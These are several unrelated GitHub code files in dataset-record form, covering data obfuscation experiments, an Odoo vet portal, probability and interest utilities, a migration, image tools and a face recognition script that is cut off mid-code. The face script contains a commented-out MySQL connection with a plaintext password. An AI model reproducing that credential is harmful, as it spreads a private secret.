X_obf_dict, X_ori = sim_obf(df_test, p=args.percentage, repeats=args.repeats)\n elif args.obf == 'privcheck':\n age_list = list(set(df['age'].values))\n age_list.sort()\n X_obf_dict, X_ori = PrivCheck(df_test, age_list, args.deltaX, args.cluster_num, repeats=args.repeats)\n\n # inference performances & recommendation utility\n rec_oris = []\n rec_obfs = []\n mae_oris_rf = []\n mae_obfs_rf = []\n mae_oris_xgb = []\n mae_obfs_xgb = []\n\n for i in range(args.repeats):\n # recommendation\n rmse_ori, rmse_obf = recommendation(X_obf_dict[i], X_ori, df_test_rec_items)\n rec_oris.append(rmse_ori)\n rec_obfs.append(rmse_obf)\n\n # inference\n df_X_obf = pd.DataFrame.from_dict(X_obf_dict[i]).T\n df_x_obf_items = df_X_obf.values[:, :-2]\n df_X_ori = pd.DataFrame.from_dict(X_ori).T\n df_x_ori_items = df_X_ori.values[:, :-2]\n df_x_y = df_test.values[:, -1]\n\n y_pred_ori_rf = model_rf.predict(df_x_ori_items)\n y_pred_obf_rf = model_rf.predict(df_x_obf_items)\n y_pred_ori_xgb = model_xgb.predict(df_x_ori_items)\n y_pred_obf_xgb = model_xgb.predict(df_x_obf_items)\n\n mae_ori_rf = mean_absolute_error(df_x_y, y_pred_ori_rf)\n mae_obf_rf = mean_absolute_error(df_x_y, y_pred_obf_rf)\n mae_ori_xgb = mean_absolute_error(df_x_y, y_pred_ori_xgb)\n mae_obf_xgb = mean_absolute_error(df_x_y, y_pred_obf_xgb)\n\n mae_oris_rf.append(mae_ori_rf)\n mae_obfs_rf.append(mae_obf_rf)\n mae_oris_xgb.append(mae_ori_xgb)\n mae_obfs_xgb.append(mae_obf_xgb)\n\n m_rmse_ori = np.mean(rec_oris)\n m_rmse_obf = np.mean(rec_obfs)\n\n m_mae_ori_rf = np.mean(mae_oris_rf)\n m_mae_obf_rf = np.mean(mae_obfs_rf)\n m_mae_ori_xgb = np.mean(mae_oris_xgb)\n m_mae_obf_xgb = np.mean(mae_obfs_xgb)\n\n print(\"Utility on Recommendation\")\n print(\"Ori RMSE: {:.4f}, Obf RMSE: {:.4f}\".format(m_rmse_ori, m_rmse_obf))\n print(\"Age Inference Performances\")\n print(\"RandomForest - Ori MAE: {:.4f}, Obf MAE: 
{:.4f}\".format(m_mae_ori_rf, m_mae_obf_rf))\n print(\"XGBoost - Ori MAE: {:.4f}, Obf MAE: {:.4f}\".format(m_mae_ori_xgb, m_mae_obf_xgb))\n","repo_name":"SUFE-AILAB-HXGROUP/PPDP","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14478194302","text":"from odoo import http, _\nfrom odoo.http import request\nfrom odoo.addons.portal.controllers.portal import CustomerPortal\nfrom odoo.exceptions import AccessError, MissingError\n\n\nclass VetPortalController(CustomerPortal):\n def _prepare_portal_layout_values(self):\n values = super(\n VetPortalController, self\n )._prepare_portal_layout_values()\n animal_count = request.env[\"res.animal\"].search_count([])\n appointment_count = request.env[\"animal.appointment\"].search_count(\n []\n )\n values.update(\n {\n \"animal_count\": animal_count,\n \"appointment_count\": appointment_count,\n },\n )\n return values\n\n @http.route(\"/my/animals\", type=\"http\", auth=\"user\", website=True)\n def animals_list(self, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n searchbar_sortings = {\n \"name\": {\"label\": _(\"Name\"), \"order\": \"name\"},\n \"age\": {\"label\": _(\"Age\"), \"order\": \"birthday desc\"},\n }\n\n if not sortby:\n sortby = \"name\"\n sort_order = searchbar_sortings[sortby][\"order\"]\n\n animals = request.env[\"res.animal\"].search([], order=sort_order)\n\n values.update(\n {\n \"animals\": animals,\n \"page_name\": \"my_animals\",\n \"default_url\": \"/my/animals\",\n \"searchbar_sortings\": searchbar_sortings,\n \"sortby\": sortby,\n }\n )\n return request.render(\"med_vet_manager.animals_list\", values)\n\n def _animal_get_page_view_values(self, animal, access_token, **kwargs):\n values = {\n \"page_name\": \"animal\",\n \"animal\": animal,\n }\n return self._get_page_view_values(\n animal,\n access_token,\n values,\n \"my_animals_history\",\n False,\n **kwargs\n )\n\n @http.route(\n [\"/my/animals/\"],\n type=\"http\",\n auth=\"public\",\n website=True,\n )\n def portal_my_animal(self, animal_id=None, access_token=None, **kw):\n try:\n animal_sudo = self._document_check_access(\n \"res.animal\", animal_id, access_token\n )\n except (AccessError, MissingError):\n return request.redirect(\"/my\")\n\n values = self._animal_get_page_view_values(\n animal_sudo, access_token, **kw\n )\n return request.render(\"med_vet_manager.portal_my_animal\", values)\n\n # APPOINTMENTS\n\n @http.route(\"/my/appointments\", type=\"http\", auth=\"user\", website=True)\n def appointments_list(self, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n searchbar_sortings = {\n \"name\": {\"label\": _(\"Name\"), \"order\": \"name\"},\n \"date\": {\"label\": _(\"Date\"), \"order\": \"date desc\"},\n \"stage\": {\"label\": _(\"Stage\"), \"order\": \"stage_id\"},\n }\n\n if not sortby:\n sortby = \"date\"\n sort_order = searchbar_sortings[sortby][\"order\"]\n\n appointments = request.env[\"animal.appointment\"].search(\n [], order=sort_order\n )\n\n values.update(\n {\n \"appointments\": appointments,\n \"page_name\": \"my_appointments\",\n \"default_url\": \"/my/appointments\",\n \"searchbar_sortings\": searchbar_sortings,\n \"sortby\": sortby,\n }\n )\n return request.render(\"med_vet_manager.appointments_list\", values)\n\n def _appointment_get_page_view_values(\n self, appointment, access_token, **kwargs\n ):\n values = {\n \"page_name\": \"appointment\",\n 
\"appointment\": appointment,\n }\n return self._get_page_view_values(\n appointment,\n access_token,\n values,\n \"my_appointments_history\",\n False,\n **kwargs\n )\n\n @http.route(\n [\"/my/appointments/\"],\n type=\"http\",\n auth=\"public\",\n website=True,\n )\n def portal_my_appointment(\n self, appointment_id=None, access_token=None, **kw\n ):\n try:\n appointment_sudo = self._document_check_access(\n \"animal.appointment\", appointment_id, access_token\n )\n except (AccessError, MissingError):\n return request.redirect(\"/my\")\n\n values = self._appointment_get_page_view_values(\n appointment_sudo, access_token, **kw\n )\n return request.render(\n \"med_vet_manager.portal_my_appointment\", values\n )\n","repo_name":"felipepaloschi/odoo-course","sub_path":"med_vet_manager/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32693456507","text":"import random\nfrom .fraction import Fraction\n\nclass CoinMachine:\n\n def __init__(self, coins_for_one_exp: int, number_of_exits_to_cont: int, number_of_exits_event_happened: int):\n if coins_for_one_exp < 1:\n raise ValueError(\"Bad number of coins\")\n self.coin_count = coins_for_one_exp\n max_number = 2 ** coins_for_one_exp\n if number_of_exits_to_cont + number_of_exits_event_happened > max_number:\n raise ValueError(\"Bad numbers\")\n if number_of_exits_to_cont + number_of_exits_event_happened >= max_number:\n raise ValueError(\"Probability is const\")\n exits_list = random.sample(range(2 ** coins_for_one_exp), number_of_exits_to_cont + number_of_exits_event_happened)\n self.exits_to_continue = exits_list[:number_of_exits_to_cont]\n self.exits_event_happened = exits_list[number_of_exits_to_cont:]\n\n\n def description(self):\n return 'Автомат за раз подбрасывает {} монет. В случае выпадания одного из {} исходов, подбрасывания продолжаются. В случае выпадания одного из {} других исходов, считается, что событие произошло. 
Иначе - событие не произошло'.\\\n format(self.coin_count, len(self.exits_to_continue), len(self.exits_event_happened))\n \n def conduct(self):\n res = random.randint(0, 2 ** self.coin_count)\n while res in self.exits_to_continue:\n res = random.randint(0, 2 ** self.coin_count)\n if res in self.exits_event_happened:\n return True\n return False\n \n def probability_by_formula(self):\n x = 2 ** self.coin_count\n return Fraction(len(self.exits_event_happened), x - len(self.exits_to_continue))\n\n\n def try_experiments(self, number: int):\n result = []\n for i in range(number):\n result.append(self.conduct())\n good_exits = result.count(True)\n return good_exits / number","repo_name":"sgwps/coins_flipper","sub_path":"coin_machine/main/logic/coin_machine.py","file_name":"coin_machine.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17198618198","text":"def CDT(usuario:str, capital:int, tiempo:int):\r\n valorIntereses = 0\r\n valorTotal = 0\r\n \r\n if tiempo > 2:\r\n valorIntereses = capital * 0.03 * tiempo / 12\r\n valorTotal = valorIntereses + capital\r\n\r\n return \"Para el usuario {} La cantidad de dinero a recibir, según el monto inicial {} para un tiempo de {} meses es: {}\".format(usuario, capital, tiempo, valorTotal)\r\n\r\n else: \r\n valorIntereses = capital * 0.02\r\n valorTotal = capital - valorIntereses\r\n\r\n return \"Para el usuario {} La cantidad de dinero a recibir, según el monto inicial {} para un tiempo de {} meses es: {}\".format(usuario, capital, tiempo, valorTotal)\r\n\r\n\r\nprint(CDT('user91', 1000000, 3))\r\nprint(CDT('user91', 650000, 2))\r\n","repo_name":"mario994/MisionTIC-Ruta-2-2022-UTP","sub_path":"Programming/Cicle_1/Unit_2/Challenge_1/Challenge1Solution.py","file_name":"Challenge1Solution.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74938226667","text":"#!/usr/bin/env python\n\"\"\"\nCommand line interface for running sample queries\n\"\"\"\n\nimport os\nimport argparse\nfrom pprint import pprint\nfrom json import dump\n\nfrom asld.search import ASLDSearch, Algorithm\nfrom asld.sample_queries import automatons\n\nfrom asld.utils.color_print import Color\n\n\n# Parse arguments\n# ===============\nparser = argparse.ArgumentParser(description='Process some queries')\n\n# Query\nparser.add_argument('-w', metavar='w', type=int, default=1,\n help='weight to use on the heuristic')\nparser.add_argument('-q', metavar='q', type=int, default=0,\n help='query ID')\n\n# Search tuning\nparser.add_argument(\"--slow-goal\", help=\"Use regular goal declaration\", action=\"store_true\")\nparser.add_argument('--pool-size', metavar='p', type=int, default=40,\n help='Process pool size to use')\n\n# Search limits\nparser.add_argument('--time', metavar='t', type=int, default=10*60,\n help='Time limit [s]')\nparser.add_argument('--ans', metavar='a', type=int, default=1e3,\n help='Answer limit')\nparser.add_argument('--triples', metavar='s', type=int, default=1e5,\n help='Triples limit')\n\nparser.add_argument('--alg', metavar='t', type=str, default=\"a*\",\n help='A* | Dijkstra | BFS | DFS')\n\nargs = parser.parse_args()\n\nALGORITHM = Algorithm.parse(args.alg)\nALGORITHM_N = Algorithm.to_string(ALGORITHM)\nw = args.w\nquick_goal = not args.slow_goal\nquery_number = args.q\n\nparallel_requests = args.pool_size\n\nlimit_time = args.time\nlimit_ans = 
args.ans\nlimit_triples = args.triples\n\n(query, query_name) = automatons[query_number]\n\n\nif query is None:\n print(\"Review the query number\")\nelse:\n # Run query\n # =========\n data = None\n result = {\n \"query\": query_name,\n \"params\": {\n \"limits\": {\n \"time\": limit_time,\n \"triples\": limit_triples,\n \"ans\": limit_ans,\n },\n \"algorithm\": ALGORITHM_N,\n \"parallelRequests\": parallel_requests,\n \"quickGoal\": quick_goal,\n \"weight\": w\n },\n \"data\": data\n }\n\n try:\n print(\"Solving %s...\" % query_name)\n\n print(\"Parameters:\")\n print(\" Algorithm: %s\" % ALGORITHM_N)\n print(\" Quick-Goal: %s\" % quick_goal)\n print(\" Weight: %d\" % w)\n print(\" Pool Size: %d\" % parallel_requests)\n print(\" Limits:\")\n print(\" Time: %ds\" % limit_time)\n print(\" Answers: %d\" % limit_ans)\n print(\" Triples: %d\" % limit_triples)\n\n # Run search\n search = ASLDSearch(query(w=w), quick_goal=quick_goal, alg=ALGORITHM)\n\n data = search.test(parallel_requests,\n limit_time = limit_time,\n limit_ans = limit_ans,\n limit_triples = limit_triples)\n result[\"data\"] = data\n\n\n except KeyboardInterrupt:\n Color.BLUE.print(\"\\nTerminating search.\")\n\n finally:\n # Make sub-directory\n results_directory = \"bench/last/\"\n results_directory += \"q%d-%s/\" % (query_number, query_name)\n\n results_directory += \"p%d/\" % parallel_requests\n if quick_goal:\n results_directory += \"quick/\"\n else:\n results_directory += \"slow/\"\n os.makedirs(results_directory, mode=0o777, exist_ok=True)\n\n # Save files\n fileName = results_directory\n fileName += \"q%d--\" % query_number\n fileName += \"%s\" % ALGORITHM_N\n fileName += \"-w%d\" % w\n fileName += \"-p%d\" % parallel_requests\n if quick_goal:\n fileName += \"-quickGoal\"\n else:\n fileName += \"-slowGoal\"\n fileName += \"-time%d-ans%d-triples%d\" % (limit_time,\n limit_ans,\n limit_triples)\n fileName += \".json\"\n\n print(\"Writing log to %s\" % fileName)\n with open(fileName, 'w') as f:\n dump(result, f, indent=2)\n\n if data:\n stats = data[\"StatsHistory\"]\n if stats:\n Color.BLUE.print(\"Last stats:\")\n pprint(stats[-1])\n","repo_name":"Dietr1ch/asld","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71132877546","text":"\"\"\"initial migration\n\nRevision ID: e3f539a683a3\nRevises: \nCreate Date: 2021-01-14 03:24:10.557006\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"e3f539a683a3\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table(\n \"contact_types\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"hex_colour\", sa.String(length=8), nullable=True),\n sa.Column(\"type\", sa.String(length=64), nullable=True),\n sa.Column(\"description\", sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"projects\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"address\", sa.String(length=256), nullable=True),\n sa.Column(\"city\", sa.String(length=64), nullable=True),\n sa.Column(\"province\", sa.String(length=64), nullable=True),\n sa.Column(\"postal_code\", sa.String(length=64), nullable=True),\n sa.Column(\"neighbourhood\", sa.String(length=256), nullable=True),\n sa.Column(\"year\", sa.Integer(), nullable=True),\n sa.Column(\"name\", sa.String(length=64), nullable=True),\n sa.Column(\"type\", sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"users\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=64), nullable=False),\n sa.Column(\"email\", sa.String(length=64), nullable=False),\n sa.Column(\"role\", sa.String(length=32), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"email\"),\n sa.UniqueConstraint(\"id\"),\n sa.UniqueConstraint(\"role\"),\n )\n op.create_table(\n \"contact\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=256), nullable=False),\n sa.Column(\"email\", sa.String(length=256), nullable=False),\n sa.Column(\"secondary_email\", sa.String(length=256), nullable=True),\n sa.Column(\"cellphone\", sa.String(length=256), nullable=False),\n sa.Column(\"role\", sa.String(length=256), nullable=True),\n sa.Column(\"organization\", sa.String(length=256), nullable=False),\n sa.Column(\"neighbourhood\", sa.String(length=256), nullable=True),\n sa.Column(\"contact_type\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.ForeignKeyConstraint(\n [\"contact_type\"],\n [\"contact_types.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"donations\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=64), nullable=False),\n sa.Column(\"email\", sa.String(length=64), nullable=False),\n sa.Column(\"date\", sa.DateTime(), nullable=True),\n sa.Column(\"donation_source\", sa.String(length=128), nullable=False),\n sa.Column(\"event\", sa.String(length=128), nullable=True),\n sa.Column(\"num_tickets\", sa.Integer(), nullable=True),\n sa.Column(\"added_by\", postgresql.UUID(as_uuid=True), nullable=True),\n sa.ForeignKeyConstraint(\n [\"added_by\"],\n [\"users.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"email\"),\n )\n op.create_table(\n \"association\",\n sa.Column(\"contact_id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"project_id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.ForeignKeyConstraint(\n [\"contact_id\"],\n [\"contact.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"project_id\"],\n [\"projects.id\"],\n ),\n sa.PrimaryKeyConstraint(\"contact_id\", \"project_id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table(\"association\")\n op.drop_table(\"donations\")\n op.drop_table(\"contact\")\n op.drop_table(\"users\")\n op.drop_table(\"projects\")\n op.drop_table(\"contact_types\")\n # ### end Alembic commands ###\n","repo_name":"hack4impact-mcgill/mu-crm-tool","sub_path":"backend/migrations/versions/e3f539a683a3_initial_migration.py","file_name":"e3f539a683a3_initial_migration.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17113520050","text":"import copy\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport numpy as np\n\nfrom usac.visualizations.visualizer import Visualizer\nfrom usac.visualizations.utils import labels_for_timestep\nfrom usac.visualizations.utils import cmap_for_timestep\n\ndef idxs_to_coords(idxs: np.ndarray, rows: int, cols: int):\n idxs = np.array(idxs)\n assert (idxs < rows * cols).all()\n xs = idxs % cols\n ys = idxs // cols\n return xs, ys\n\ndef split_label(label: int, dendogram: np.ndarray, rows: int, cols: int):\n max_index = rows * cols\n # breakpoint()\n # print(f\"exploring label {label}\")\n if label < max_index:\n return label, \"\", [label], []\n\n subcluster_1, subcluster_2 = dendogram[label - max_index]\n\n # Right side of tree\n _, _, c1, c2 = split_label(subcluster_1, dendogram, rows, cols)\n left_cluster = c1 + c2\n\n # Left side of tree\n _, _, c1, c2 = split_label(subcluster_2, dendogram, rows, cols)\n right_cluster = c1 + c2\n\n return subcluster_1, subcluster_2, left_cluster, right_cluster\n\nclass ClickSplitVisualizer(Visualizer):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def clicked(self, ev, ax, fig, im, dendogram: np.ndarray) -> None:\n x, y = int(ev.xdata), int(ev.ydata)\n current_label = self.current_labels[y, x]\n\n # print(\"BEFORE\", np.unique(self.current_labels))\n\n if self.mode == 'join':\n if current_label >= self.rows*self.cols + len(dendogram):\n print(\"You've reached the top of the tree. 
Click on another color...\")\n else:\n row = np.where(current_label == dendogram)[0][0]\n c1, c2 = dendogram[row]\n mask = (self.current_labels == c1) | (self.current_labels == c2)\n self.current_labels[mask] = self.rows * self.cols + row\n else:\n newlabel1, newlabel2, c1, c2 = split_label(current_label, dendogram, self.rows, self.cols)\n c1x, c1y = idxs_to_coords(c1, self.rows, self.cols)\n c2x, c2y = idxs_to_coords(c2, self.rows, self.cols)\n self.current_labels[c1y, c1x] = newlabel1\n self.current_labels[c2y, c2x] = newlabel2\n\n # print(\"AFTER\", np.unique(self.current_labels))\n # print('------')\n\n # Reset labels to something low\n tmp_labels = self.current_labels.reshape(-1)\n unique, tmp_labels = np.unique(tmp_labels, return_inverse=True)\n\n im.set_data(self.cmap(tmp_labels.reshape(self.rows, self.cols)))\n im.autoscale()\n fig.canvas.draw_idle()\n\n def pressed(self, ev):\n if ev.key == 'p':\n print(\"Split mode...\")\n self.mode = 'split'\n elif ev.key == 'j':\n print(\"Join mode...\")\n self.mode = 'join'\n\n def visualize(self, labels: np.ndarray,\n rgb: np.ndarray = None,\n depth: np.ndarray = None,\n dendogram: np.ndarray = None) -> None:\n self.rows, self.cols = labels.shape\n self.current_labels = np.ones((self.rows, self.cols), dtype=np.int32)\n self.current_labels.fill(dendogram.max() + 1)\n self.mode = 'split'\n self.cmap = plt.cm.get_cmap('tab20')\n\n fig, ax = plt.subplots()\n im = ax.imshow(self.cmap(self.current_labels), vmin=0, vmax=255)\n im.autoscale()\n fig.canvas.mpl_connect('button_release_event', lambda ev: self.clicked(ev, ax, fig, im, dendogram))\n fig.canvas.mpl_connect('key_press_event', lambda ev: self.pressed(ev))\n plt.show()\n","repo_name":"Reichenbachian/UnsupervisedSegmentation","sub_path":"usac/visualizations/click_split.py","file_name":"click_split.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19193968739","text":"import os, time, requests, argparse\nfrom io import BytesIO\nfrom PIL import Image\n\nURL = \"https://www.thispersondoesnotexist.com/image\"\nSLEEP = 1\nOUTPUT_FILENAME_PATTERN = \"data/person_{:03d}.jpg\"\n\nfileidx = 1\n\ndef get_available_filename():\n global fileidx\n while os.path.isfile(OUTPUT_FILENAME_PATTERN.format(fileidx)):\n fileidx += 1\n return OUTPUT_FILENAME_PATTERN.format(fileidx)\n\n#############################################################################\n# MAIN\n#############################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--num\", default=3, type=int)\nargs = parser.parse_args()\n\nprint(f\"Will download {args.num} image(s)\")\nfor _ in range(args.num):\n print(\"Fetching another...\")\n r = requests.get(URL, headers={'User-Agent': 'My User Agent 1.0'})\n img = Image.open(BytesIO(r.content)) # renamed from 'i' so the loop variable is no longer shadowed\n\n filename = get_available_filename()\n print(f\"Saving to {filename}\")\n img.save(filename)\n print(f\"Sleeping {SLEEP} second(s)\")\n time.sleep(SLEEP)\n","repo_name":"eguendelman/scatterface","sub_path":"tools/download_people.py","file_name":"download_people.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21143524624","text":"import csv\nimport xmltodict\nimport yaml\nimport json\n\ndef convertTxtToDict(txtFile):\n txtDict = {}\n with open(txtFile, 'r') as f:\n for line in f:\n key, value = line.strip().split(\":\", 1) # split on the first colon only, so values may contain ':'\n 
txtDict[key] = value\n return txtDict\n \ndef convertCsvToDict(csvFile):\n csvDict = {}\n with open(csvFile, mode='r') as infile:\n reader = csv.DictReader(infile, skipinitialspace=True)\n csvDict = [r for r in reader]\n return csvDict\n\ndef convertXmlToDict(xmlFile):\n with open(xmlFile, 'r', encoding='utf-8') as file:\n xmlFromFile = file.read()\n return xmltodict.parse(xmlFromFile)\n\ndef convertYmlToDict(ymlFile):\n ymlDict = {}\n with open(ymlFile) as f:\n ymlDict = yaml.safe_load(f)\n return ymlDict\n\ndef convertJsonToDict(jsonFile):\n jsonDict = {}\n with open(jsonFile) as f:\n jsonDict = json.load(f)\n return jsonDict\n","repo_name":"StortM/SI","sub_path":"04-basic-servers/python/fileParser.py","file_name":"fileParser.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30648733869","text":"from data.flownet import FlowNet\nfrom torchvision import transforms\n\nclass FlowNetWrapper:\n\n def __init__(self) -> None:\n self.flownet = FlowNet()\n self.to_tensor_and_norm_rgb = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]\n )\n\n def getFlow(self, im1, im2):\n im1 = self.to_tensor_and_norm_rgb(im1).unsqueeze(0).cuda()\n im2 = self.to_tensor_and_norm_rgb(im2).unsqueeze(0).cuda()\n flow_, conf_ = self.flownet(im1, im2)\n return flow_.squeeze().data.cpu().numpy().transpose(1, 2, 0)\n\n def getSample(self, im, flow):\n return self.flownet.sample(im,flow)","repo_name":"manishmanu/VideoVirtualTryon-HCAI-Project","sub_path":"test/data/flownet_wrapper.py","file_name":"flownet_wrapper.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28285202868","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# pylint: disable=C0103\n# pylint: disable=E1101\n\nimport sys\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom utils import label_map_util\nfrom utils import visualization_utils_color as vis_util\nfrom datetime import datetime\nimport uuid\nimport dlib\nimport face_recognition\nimport facenet\nimport mysql.connector\n\nfrom functions import *\n\nfrom scipy import misc\n\n# Path to frozen detection graph. 
This is the actual model that is used for the object detection.\nPATH_TO_CKPT = './model/frozen_inference_graph_face.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = './protos/face_label_map.pbtxt'\n\npathtofacenet = './model/testmodel/20180402-114759.pb'\n\npose_predictor_68_point = dlib.shape_predictor('./shape_predictor_68_face_landmarks.dat')\nface_encoder = dlib.face_recognition_model_v1('./model/dlib_face_recognition_resnet_model_v1.dat')\n\n\n\nNUM_CLASSES = 2\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\nminsize = 20\ninput_image_size = 160\n\n# mydb = mysql.connector.connect(\n# host=\"127.0.0.1\",\n# port='3311',\n# user=\"root\",\n# passwd=\"Amitsaini374\",\n# auth_plugin='sha256_password',\n# database=\"Aknownymousdb\"\n# )\n# mycursor = mydb.cursor()\n\n\n# read 20170512-110547 model file downloaded from https://drive.google.com/file/d/0B5MzpY9kBtDVZ2RpVDYwWmxoSUk\n\n# Get input and output tensors\n\n\nclass TensoflowFaceDector(object):\n def __init__(self, PATH_TO_CKPT):\n \"\"\"Tensorflow detector\n \"\"\"\n\n self.detection_graph = tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\n with self.detection_graph.as_default():\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.compat.v1.Session(graph=self.detection_graph, config=config)\n self.windowNotSet = True\n\n\n def run(self, image):\n \"\"\"image: bgr image\n return (boxes, scores, classes, num_detections)\n \"\"\"\n\n image_np = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n\n start_time = time.time()\n (boxes, scores, classes, num_detections) = self.sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n elapsed_time = time.time() - start_time\n\n print('inference time cost: {}'.format(elapsed_time))\n\n\n return (boxes, scores, classes, num_detections)\n\n\nclass TensoflowFaceReckon(object):\n \"\"\"docstring for ClassName\"\"\"\n def __init__(self, pathtofacenet):\n facenet.load_model(\"./model/testmodel/20180402-114759.pb\")\n self.images_placeholder = tf.compat.v1.get_default_graph().get_tensor_by_name(\"input:0\")\n self.embeddings = 
tf.compat.v1.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n self.phase_train_placeholder = tf.compat.v1.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n self.embedding_size = self.embeddings.get_shape()[1]\n self.sess = tf.compat.v1.Session()\n \n\n\n\n def getEmbedding(self, resized):\n self.reshaped = resized.reshape(-1,input_image_size,input_image_size,3)\n self.feed_dict = {self.images_placeholder: self.reshaped, self.phase_train_placeholder: False}\n embedding = self.sess.run(self.embeddings, feed_dict=self.feed_dict)\n return embedding\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) != 2:\n print (\"usage:%s (cameraID | filename) Detect faces\\\n in the video example:%s 0\"%(sys.argv[0], sys.argv[0]))\n exit(1)\n\n try:\n camID = int(sys.argv[1])\n except:\n camID = sys.argv[1]\n \n tDetector = TensoflowFaceDector(PATH_TO_CKPT)\n\n tReckon = TensoflowFaceReckon(pathtofacenet)\n\n\n cap = cv2.VideoCapture(camID)\n windowNotSet = True\n while True:\n ret, image = cap.read()\n if ret == 0:\n break\n\n [h, w] = image.shape[:2]\n #print (h, w)\n\n (boxes, scores, classes, num_detections) = tDetector.run(image)\n\n\n\n [height, width] = image.shape[:2]\n\n max_boxes_to_draw = boxes.shape[0]\n\n z= np.squeeze(boxes)\n s= np.squeeze(scores)\n c= np.squeeze(classes).astype(np.int32)\n n=np.squeeze(num_detections).astype(np.int32)\n #print(c)\n\n max_box=z.shape[0]\n\n\n \n\n for i in range(max_box):\n if s[i] > 0.75 and c[i]==1:\n bx = z[i]\n ymin = int(bx[0]*height)\n xmin = int(bx[1]*width)\n ymax = int(bx[2]*height)\n xmax = int(bx[3]*width)\n\n if((xmax-xmin)>10 and (ymax-ymin)>10 and bx.any() ):\n\n # this function is for the first image\n\n t1 = cv2.imread('amit5.jpg')\n resize1 = cv2.resize(t1, (160, 160))\n resize12=facenet.prewhiten(resize1)\n emb2= tReckon.getEmbedding(resize1)\n\n # this function is for the second 